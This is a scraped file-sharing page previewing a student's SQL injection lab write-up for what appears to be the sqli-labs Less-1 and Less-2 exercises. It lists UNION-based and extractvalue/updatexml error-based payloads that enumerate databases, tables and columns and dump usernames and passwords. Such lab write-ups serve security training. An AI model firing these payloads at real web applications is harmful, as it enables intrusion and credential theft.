没有合适的资源?快使用搜索试试~ 我知道了~
sql注入-0629-田靖宇-17130105521
需积分: 0 0 下载量 71 浏览量
2022-08-08
19:53:48
上传
评论
收藏 1.03MB DOCX 举报
温馨提示
试读
28页
sql注入-0629-田靖宇-17130105521
资源详情
资源评论
资源推荐
SQL 注入
Less-1
(一) UNION 联合查询
1.判断注入点(存在注入)
?id=1' and 1=1 --+
2.猜字段(字段数:3)
?id=1' order by 3 -- +
3.判断回显点
?id=0' union select 1,2,3 --+
4.查询数据库(database())
?id=0' union select 1,2,database() --+
5.查表名
?id=0' union select 1,2,group_concat(table_name) from
information_schema.tables where table_schema=database() --+
6.查字段名
?id=0' union select 1,2,group_concat(column_name) from
information_schema.columns where table_name='users' --+
7.users 表中 username,password 字段值
?id=0' union select 1,2,group_concat(username,':',password) from users --+
(二) extractvalue() 报错注入
1.查询数据库
?id=1' and extractvalue(1,concat(0x7e,(select database()))) --+
2.查询表
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()))) --+
3.查字段
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name='users'))) --+
4. users 表中 username,password 字段值
?id=1' and extractvalue(1,concat(0x7e,(select
group_concat(username,':',password) from users))) --+
(三) updatexml() 报错注入
1.查询数据库
?id=1' and updatexml(1,concat(0x7e,(select database())),1) --+
2.查询表
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database())),1) --+
3.查字段
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name='users')),1) --+
4. users 表中 username,password 字段值
?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,':',password)
from users)),1) --+
Less-2
(一) UNION 联合查询
1.判断注入点(存在注入)
?id=1 and 1=1 --+
2.猜字段(字段数:3)
?id=1 order by 3 --+
3.判断回显点
?id=1.1 union select 1,2,3 --+
4.查询数据库(database())
?id=0 union select 1,2,database() --+
5.查表名
?id=0 union select 1,2,group_concat(table_name) from
information_schema.tables where table_schema=database() --+
6.查字段名
?id=0 union select 1,2,group_concat(column_name) from
information_schema.columns where table_name='users' --+
7.users 表中 username,password 字段值
?id=0 union select 1,2,group_concat(username,':',password) from users --+
(二) extractvalue() 报错注入
1.查询数据库
?id=1 and extractvalue(1,concat(0x7e,(select database()))) --+
2.查询表
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()))) --+
3.查字段
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name='users'))) --+
4. users 表中 username,password 字段值
?id=1 and extractvalue(1,concat(0x7e,(select
group_concat(username,':',password) from users))) --+
(三) updatexml() 报错注入
1.查询数据库
?id=1 and updatexml(1,concat(0x7e,(select database())),1) --+
2.查询表
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database())),1) --+
3.查字段
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name='users')),1) --+
剩余27页未读,继续阅读
白羊的羊
- 粉丝: 35
- 资源: 281
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 我分享个魔兽内存修改器
- Python毕业设计基于Django的网易云数据分析可视化大屏系统的设计与实现+使用说明+全部资料(优秀项目).zip
- Python毕业设计基于Django的网易云数据分析可视化大屏系统的设计与实现+使用说明+全部资料(高分项目).zip
- JavaScript实现的鼠标手势
- 人工兔优化算法ARO MATLAB源码, 应用案例为函数极值求解以及优化svm进行分类,代码注释详细,可结合自身需求进行应用
- 人才网站设计-asp.net+sql-(系统源码)
- asp.net+sql人才网站设计-含系统源码
- C#应用的用户配置窗体方案
- python实现绘制爱心图形的代码
- JAVAWEB项目-校园订餐系统项目源码.zip
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0